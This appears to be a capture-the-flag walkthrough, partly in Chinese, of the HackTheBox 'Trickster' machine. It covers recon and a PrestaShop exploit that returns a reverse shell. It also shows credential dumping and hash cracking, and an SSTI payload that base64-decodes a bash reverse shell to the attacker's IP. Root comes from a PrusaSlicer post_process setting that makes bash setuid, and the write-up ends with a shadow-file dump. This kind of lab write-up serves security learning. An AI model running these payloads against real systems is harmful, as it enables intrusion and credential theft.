Tags: Prestashop、CVE-2024-34716、Hashcat、Docker、ChangeDetection.io、CVE-2024-32651、SSTI、Prusaslicer、CVE-2023-47268
Recon & Enum
nmap -p- --min-rate 1000 -T4 -sC -sV -O -v Trickster.htb
---
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 8c:01:0e:7b:b4:da:b7:2f:bb:2f:d3:a3:8c:a6:6d:87 (ECDSA)
|_ 256 90:c6:f3:d8:3f:96:99:94:69:fe:d3:72:cb:fe:6c:c5 (ED25519)
80/tcp open http Apache httpd 2.4.52
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: 403 Forbidden
ffuf -u http://trickster.htb/ -H 'Host: FUZZ.trickster.htb' -w subdomains.txt -fc 301
---
shop [Status: 403, Size: 283, Words: 20, Lines: 10, Duration: 152ms]
feroxbuster -u http://trickster.htb -s 200,301,403
---
403 GET 9l 28w 278c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301 GET 9l 28w 315c http://trickster.htb/images => http://trickster.htb/images/
200 GET 2l 51w 1850c http://trickster.htb/assets/js/browser.min.js
200 GET 401l 738w 8035c http://trickster.htb/assets/js/main.js
200 GET 37l 80w 568c http://trickster.htb/assets/css/noscript.css
200 GET 1638l 3543w 34125c http://trickster.htb/assets/css/main.css
200 GET 2l 87w 2438c http://trickster.htb/assets/js/breakpoints.min.js
301 GET 9l 28w 315c http://trickster.htb/assets => http://trickster.htb/assets/
200 GET 2l 1283w 86927c http://trickster.htb/assets/js/jquery.min.js
200 GET 3386l 19800w 1485483c http://trickster.htb/images/pic01.jpg
200 GET 0l 0w 1747672c http://trickster.htb/images/pic03.jpg
200 GET 0l 0w 1733227c http://trickster.htb/images/pic02.jpg
200 GET 355l 927w 12683c http://trickster.htb/
feroxbuster -u http://shop.trickster.htb -s 200,301
---
301 GET 9l 28w 323c http://shop.trickster.htb/.git => http://shop.trickster.htb/.git/
200 GET 1423l 2799w 53083c http://shop.trickster.htb/registration
200 GET 1043l 2429w 44981c http://shop.trickster.htb/password-recovery
200 GET 1155l 2446w 46524c http://shop.trickster.htb/login
200 GET 1051l 2357w 44464c http://shop.trickster.htb/search
200 GET 1071l 2387w 44984c http://shop.trickster.htb/guest-tracking
200 GET 1102l 2444w 46217c http://shop.trickster.htb/cart
301 GET 9l 28w 322c http://shop.trickster.htb/pdf => http://shop.trickster.htb/pdf/
Shell as WWW-Data
ls -la
total 216
drwx------ 4 kali kali 260 Dec 28 09:52 .
drwxrwxrwt 25 root root 540 Dec 28 12:18 ..
drwxr-xr-x 6 kali kali 240 Dec 28 10:28 .git
-rw-rw-r-- 1 kali kali 1538 Dec 28 09:52 .php-cs-fixer.dist.php
-rw-rw-r-- 1 kali kali 5054 Dec 28 09:52 INSTALL.txt
-rw-rw-r-- 1 kali kali 522 Dec 28 09:52 Install_PrestaShop.html
-rw-rw-r-- 1 kali kali 183862 Dec 28 09:52 LICENSES
-rw-rw-r-- 1 kali kali 863 Dec 28 09:52 Makefile
drwxrwxr-x 8 kali kali 380 Dec 28 09:52 admin634ewutrx1jgitlooaj
-rw-rw-r-- 1 kali kali 1305 Dec 28 09:52 autoload.php
-rw-rw-r-- 1 kali kali 2506 Dec 28 09:52 error500.html
-rw-rw-r-- 1 kali kali 1169 Dec 28 09:52 index.php
-rw-rw-r-- 1 kali kali 1256 Dec 28 09:52 init.php
发现 Prestashop 后台登录界面 admin634ewutrx1jgitlooaj,搜索 Prestashop 漏洞 CVE-2024-34716
python3 exploit.py --url http://shop.trickster.htb/ --email [email protected] --local-ip 10.10.16.4 --admin-path admin634ewutrx1jgitlooaj
---
[X] Starting exploit with:
Url: http://shop.trickster.htb/
Email: [email protected]
Local IP: 10.10.16.2
Admin Path: admin634ewutrx1jgitlooaj
[X] Ncat is now listening on port 12345. Press Ctrl+C to terminate.
Serving at http.Server on port 5000
listening on [any] 12345 ...
GET request to http://shop.trickster.htb/themes/next/reverse_shell_new.php: 403
Request: GET /ps_next_8_theme_malicious.zip HTTP/1.1
Response: 200 -
10.10.11.34 - - [29/Dec/2024 19:23:32] "GET /ps_next_8_theme_malicious.zip HTTP/1.1" 200 -
GET request to http://shop.trickster.htb/themes/next/reverse_shell_new.php: 403
connect to [10.10.16.2] from (UNKNOWN) [10.10.11.34] 56502
Linux trickster 5.15.0-121-generic #131-Ubuntu SMP Fri Aug 9 08:29:53 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
00:23:57 up 2:15, 0 users, load average: 0.52, 0.25, 0.17
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Local Enum
<?php return array (
'parameters' =>
array (
'database_host' => '127.0.0.1',
'database_port' => '',
'database_name' => 'prestashop',
'database_user' => 'ps_user',
'database_password' => 'prest@shop_o',
'database_prefix' => 'ps_',
'database_engine' => 'InnoDB',
'mailer_transport' => 'smtp',
'mailer_host' => '127.0.0.1',
'mailer_user' => NULL,
'mailer_password' => NULL,
'secret' => 'eHPDO7bBZPjXWbv3oSLIpkn5XxPvcvzt7ibaHTgWhTBM3e7S9kbeB1TPemtIgzog',
'ps_caching' => 'CacheMemcache',
...
Shell as James
mysql -u ps_user -pprest@shop_o -D prestashop -e "select email,passwd from ps_employee"
---
+---------------------+--------------------------------------------------------------+
| email | passwd |
+---------------------+--------------------------------------------------------------+
| [email protected] | $2y$10$P8wO3jruKKpvKRgWP6o7o.rojbDoABG9StPUt0dR7LIeK26RdlB/C |
| [email protected] | $2a$04$rgBYAsSHUVK3RZKfwbYY9OPJyBbt/OzGw9UHi4UnlK6yG5LyunCmm |
+---------------------+--------------------------------------------------------------+
hashcat -m 3200
---
$2a$04$rgBYAsSHUVK3RZKfwbYY9OPJyBbt/OzGw9UHi4UnlK6yG5LyunCmm:alwaysandforever
hydra -L res/user.list -P res/pass.list ssh://trickster.htb
---
[22][ssh] host: trickster.htb login: james password: alwaysandforever
Shell as User2
State Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
LISTEN 0 4096 127.0.0.1:45643 0.0.0.0:*
LISTEN 0 80 127.0.0.1:3306 0.0.0.0:*
LISTEN 0 511 *:80 *:*
LISTEN 0 128 [::]:22 [::]:*

先做个端口转发,这个高位端口没发现什么东西
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:94:b7:83 brd ff:ff:ff:ff:ff:ff
altname enp3s0
altname ens160
inet 10.10.11.34/23 brd 10.10.11.255 scope global eth0
valid_lft forever preferred_lft forever
3: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:c1:aa:f9:80 brd ff:ff:ff:ff:ff:ff
inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
valid_lft forever preferred_lft forever
19: veth6a53c87@if18: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default
link/ether 72:89:0e:9c:e7:64 brd ff:ff:ff:ff:ff:ff link-netnsid 0
看到有 docker 的虚拟网卡,扫描一下有没有 docker 服务
# 存活主机 C 段扫描
BASE_IP=172.17.0; TIMEOUT=1; for i in $(seq 254); do (if ping -c 1 -W 0.5 $BASE_IP.$i 2>&1 >/dev/null; then echo "[+] $BASE_IP.$i Up"; else echo -ne "\r[?] $BASE_IP.$i\r"; fi &) done; sleep $TIMEOUT; tput el
---
[+] 172.17.0.1 Up
[+] 172.17.0.2 Up
# 端口扫描,顺序:1-1000、10000、65535
IP=172.17.0.2; for i in `seq 10000`; do (if (echo > /dev/tcp/$IP/$i) 2>/dev/null; then echo "[+] $IP:$i Open "; else echo -ne "\r[?] $IP:$i Scan\r"; fi &); done; sleep 1; tput el
---
[+] 172.17.0.2:5000 Open
# 端口转发
ssh -L 127.0.0.1:5000:172.7.0.2:5000 [email protected]
Shell as Adam


发现一个 ChangeDetection.io 服务,可以使用 James 的凭据 alwaysandforever 登录,刚好满足 CVE-2024-32651 的版本要求
网上的大部分 Exp 是对未授权访问写的,这里需要手动调整一下,或者手动利用

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('echo L2Jpbi9iYXNoIC1jICdiYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE2LjQvMjIzMyAwPiYxJwo= | base64 -d | bash').read() }}


在 Docker 中发现了两个文件 /datastore/Backups/changedetection-backup-*.zip 先下载到本地

这里的 .br 文件需要使用 brotli 解压缩,brotli -d [file]
...
'database_host' => '127.0.0.1' ,
'database_port' => '' ,
'database_name' => 'prestashop',
'database_user' => 'adam',
'database_password' => 'adam_admin992',
'database_prefix' => 'ps_' ,
'database_engine' => 'InnoDB' ,
...
发现 adam / adam_admin992
Local Enum
sudo -l
Matching Defaults entries for adam on trickster:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User adam may run the following commands on trickster:
(ALL) NOPASSWD: /opt/PrusaSlicer/prusaslicer
Shell as Root
prusaslicer 是一个 3D 打印相关的工具,那么很有可能会出现 PDF 处理等类似的漏洞,searchsploit 搜索找到 CVE-2023-47268

# Exploit Title: PrusaSlicer 2.6.1 - Arbitrary code execution on g-code export
# Date: 16/01/2024
# Exploit Author: Kamil Breński
# Vendor Homepage: https://www.prusa3d.com
# Software Link: https://github.com/prusa3d/PrusaSlicer
# Version: PrusaSlicer up to and including version 2.6.1
# Tested on: Windows and Linux
# CVE: CVE-2023-47268
==========================================================================================
1.) 3mf Metadata extension
==========================================================================================
PrusaSlicer 3mf project (zip) archives contain the 'Metadata/Slic3r_PE.config' file which describe various project settings, this is an extension to the regular 3mf file. PrusaSlicer parses this additional file to read various project settings. One of the settings (post_process) is the post-processing script (https://help.prusa3d.com/article/post-processing-scripts_283913) this feature has great potential for abuse as it allows a malicious user to create an evil 3mf project that will execute arbitrary code when the targeted user exports g-code from the malicious project. A project file needs to be modified with a prost process script setting in order to execute arbitrary code, this is demonstrated on both a Windows and Linux host in the following way.
==========================================================================================
2.) PoC
==========================================================================================
For the linux PoC, this CLI command is enough to execute the payload contained in the project. './prusa-slicer -s code-exec-linux.3mf'. After slicing, a new file '/tmp/hax' will be created. This particular PoC contains this 'post_process' entry in the 'Slic3r_PE.config' file:
; post_process = “/usr/bin/id > /tmp/hax #\necho ‘Here I am, executing arbitrary code on this host. Thanks for slicing (x_x)’>> /tmp/hax #”
Just slicing the 3mf using the `-s` flag is enough to start executing potentially malicious code.
For the windows PoC with GUI, the malicious 3mf file needs to be opened as a project file (or the settings imported). After exporting, a pop-up executed by the payload will appear. The windows PoC contains this entry:
; post_process = “C:\Windows\System32\cmd.exe /c msg %username% Here I am, executing arbitrary code on this host. Thanks for slicing (x_x) “
大致利用方法就是,解包 3mf 文件后在 Slic3r_PE.config 中配置 ; post_process = “/usr/bin/id” 就可以执行命令了
# 目标机器给了一个 3mf 文件可以使用 /opt/PrusaSlicer/TRICKSTER.3mf
unzip TRICKSTER.3mf -d TRICKSTER
---
Archive: TRICKSTER.3mf
inflating: TRICKSTER/[Content_Types].xml
inflating: TRICKSTER/Metadata/thumbnail.png
inflating: TRICKSTER/_rels/.rels
inflating: TRICKSTER/3D/3dmodel.model
inflating: TRICKSTER/Metadata/Slic3r_PE.config
inflating: TRICKSTER/Metadata/Slic3r_PE_model.config
tree
---
.
├── 3D
│ └── 3dmodel.model
├── Metadata
│ ├── Slic3r_PE.config
│ ├── Slic3r_PE_model.config
│ └── thumbnail.png
├── [Content_Types].xml
└── _rels
# 需要修改两处,output_filename_format 如果不修改,执行会报错
; output_filename_format = out.gcode
; post_process = "chmod u+s /bin/bash"
# 然后在重新打包,注意要在刚刚解包在的 TRICKSTER 目录来保证各个文件的索引位置
zip -r TRICKSTER.3mf *
curl http://10.10.16.2/TRICKSTER.3mf -o TRICKSTER.3mf
sudo /opt/PrusaSlicer/prusaslicer -s TRICKSTER.3mf
---
10 => Processing triangulated mesh
10 => Processing triangulated mesh
20 => Generating perimeters
20 => Generating perimeters
30 => Preparing infill
45 => Making infill
30 => Preparing infill
45 => Making infill
10 => Processing triangulated mesh
20 => Generating perimeters
30 => Preparing infill
45 => Making infill
65 => Searching support spots
65 => Searching support spots
65 => Searching support spots
65 => Searching support spots
65 => Searching support spots
69 => Alert if supports needed
print warning: Detected print stability issues:
Loose extrusions
Shape-Sphere, Shape-Sphere, Shape-Sphere, Shape-Sphere
Collapsing overhang
Shape-Sphere, Shape-Sphere, Shape-Sphere, Shape-Sphere
Low bed adhesion
TRICKSTER.HTB, Shape-Sphere, Shape-Sphere, Shape-Sphere, Shape-Sphere
Consider enabling supports.
Also consider enabling brim.
88 => Estimating curled extrusions
88 => Estimating curled extrusions
88 => Estimating curled extrusions
88 => Estimating curled extrusions
88 => Estimating curled extrusions
88 => Generating skirt and brim
90 => Exporting G-code to out.gcode
Slicing result exported to out.gcode

More and More
这个 Box 比较需要经验,两次横向需要翻文件,最后提权还是个陌生的 3D,总体差评。
docker ps
---
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
a4b9a36ae7ff changedetection:latest "python ./changedete…" 3 months ago Up 15 minutes 5000/tcp changedetection.io
Dump Hash
root:$y$j9T$oH3O1lHmDWiZbB909qnHG1$DMJpaZJ42dQYhNLqrKCCda5bhgFNlrdgQHgZV69KpZ3:19992:0:99999:7:::
daemon:*:19405:0:99999:7:::
bin:*:19405:0:99999:7:::
sys:*:19405:0:99999:7:::
sync:*:19405:0:99999:7:::
games:*:19405:0:99999:7:::
man:*:19405:0:99999:7:::
lp:*:19405:0:99999:7:::
mail:*:19405:0:99999:7:::
news:*:19405:0:99999:7:::
uucp:*:19405:0:99999:7:::
proxy:*:19405:0:99999:7:::
www-data:*:19405:0:99999:7:::
backup:*:19405:0:99999:7:::
list:*:19405:0:99999:7:::
irc:*:19405:0:99999:7:::
gnats:*:19405:0:99999:7:::
nobody:*:19405:0:99999:7:::
_apt:*:19405:0:99999:7:::
systemd-network:*:19405:0:99999:7:::
systemd-resolve:*:19405:0:99999:7:::
messagebus:*:19405:0:99999:7:::
systemd-timesync:*:19405:0:99999:7:::
pollinate:*:19405:0:99999:7:::
sshd:*:19405:0:99999:7:::
syslog:*:19405:0:99999:7:::
uuidd:*:19405:0:99999:7:::
tcpdump:*:19405:0:99999:7:::
tss:*:19405:0:99999:7:::
landscape:*:19405:0:99999:7:::
fwupd-refresh:*:19405:0:99999:7:::
usbmux:*:19866:0:99999:7:::
james:$y$j9T$nFUssQJghJkY44BaQM2aD1$E9pJTfQ5CwEkaU/7O07HAh.4UsM1lOhKHqyRP1XEtL4:19868:0:99999:7:::
lxd:!:19866::::::
mysql:!:19866:0:99999:7:::
adam:$y$j9T$BUeIuw29kb15rDAz8ZXOt/$WG54Q2KcL9UI.zK0r2WaeXb6zUQioT1HBxJ0TfjF736:19868:0:99999:7:::
dnsmasq:*:19866:0:99999:7:::
runner:$y$j9T$1GBk1cQSxkwCXeThdrzvp.$.q2JbGTK0oFJG0aMtLjaVoRiv5419bO0gOC9mTJO2iB:19975:0:99999:7:::
_laurel:!:19979::::::
postfix:*:19983:0:99999:7:::
